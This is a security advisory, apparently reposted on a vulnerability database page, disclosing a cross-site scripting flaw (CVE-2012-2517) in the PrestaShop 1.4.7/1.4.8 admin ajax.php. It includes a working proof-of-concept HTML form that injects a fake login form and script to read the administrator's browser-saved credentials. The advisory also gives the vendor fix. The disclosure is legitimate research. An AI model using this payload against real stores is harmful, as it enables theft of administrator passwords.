| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
| PrestaShop 1.4.7 / 1.4.8 Cross Site Scripting | 30 Aug 201200:00 | – | zdt | |
| CVE-2012-2517 | 29 Aug 201200:00 | – | circl | |
| CVE-2012-2517 | 11 Feb 202019:12 | – | cve | |
| CVE-2012-2517 | 11 Feb 202019:12 | – | cvelist | |
| EUVD-2012-2503 | 7 Oct 202500:30 | – | euvd | |
| XSS in PrestaShop | 9 May 201200:00 | – | htbridge | |
| CVE-2012-2517 | 11 Feb 202020:15 | – | nvd | |
| Cross site scripting | 11 Feb 202020:15 | – | prion | |
| XSS in PrestaShop | 2 Sep 201200:00 | – | securityvulns | |
| Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl) | 2 Sep 201200:00 | – | securityvulns |
`Advisory ID: HTB23091
Product: PrestaShop
Vendor: PrestaShop, Inc.
Vulnerable Version(s): 1.4.7, 1.4.8 and probably prior
Tested Version: 1.4.7, 1.4.8
Vendor Notification: May 9, 2012
Public Disclosure: August 29, 2012
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: CVE-2012-2517
CVSSv2 Base Score: 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N)
Solution Status: Fixed by Vendor
Risk Level: Low
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )
-----------------------------------------------------------------------------------------------
Advisory Details:
High-Tech Bridge SA Security Research Lab has discovered vulnerability in PrestaShop, which can be exploited to perform Cross-Site Scripting (XSS) attacks.
1) Cross-Site Scripting (XSS) in PrestaShop
Input passed via the "product" POST parameter to ajax.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in administrator's browser session in context of an affected website.
PrestaShop sets cookies with http-only flag, therefore classic XSS exploitation designed to steal cookies will not work. The following PoC code steals passwords stored in Firefox ("remember password" function) profile:
<form action="http://[host]/[ADMIN_PANEL]/ajax.php" method="post">
<input type="hidden" name="ajaxProductsPositions" value='' />
<input type="hidden" name="id_product" value='1' />
<input type="hidden" name="id_category" value='1' />
<input type="hidden" name='product[<form action="/[ADMIN_PANEL]/login.php" method="post"><input type="text" id="email" name="email" value="" class="input"/><input id="passwd" type="password" name="passwd" class="input" value=""/></form><script>function hackfunc() { alert("Your Login: "+document.getElementById("email").value+"\nYour Password: "+document.getElementById("passwd").value); } setTimeout("hackfunc()", 1000);</script>]' value='1_1_1' />
<input type="submit" id="btn">
</form>
This PoC was successfully tested on Firefox 12.0 in default configuration, with one saved password.
Other attack scenarios that do not involve cookies disclosure are also possible.
-----------------------------------------------------------------------------------------------
Solution:
Upgrade to PrestaShop v1.4.9
More Information:
http://www.prestashop.com/blog/en/upgrade-your-online-store-to-prestashop-v1-4-9/
http://www.prestashop.com/en/download
-----------------------------------------------------------------------------------------------
References:
[1] High-Tech Bridge Advisory HTB23091 - https://www.htbridge.com/advisory/HTB23091 - XSS in PrestaShop.
[2] PrestaShop - http://www.prestashop.com/ - PrestaShop is a secure and fully customizable Open-source e-commerce software.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
-----------------------------------------------------------------------------------------------
Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation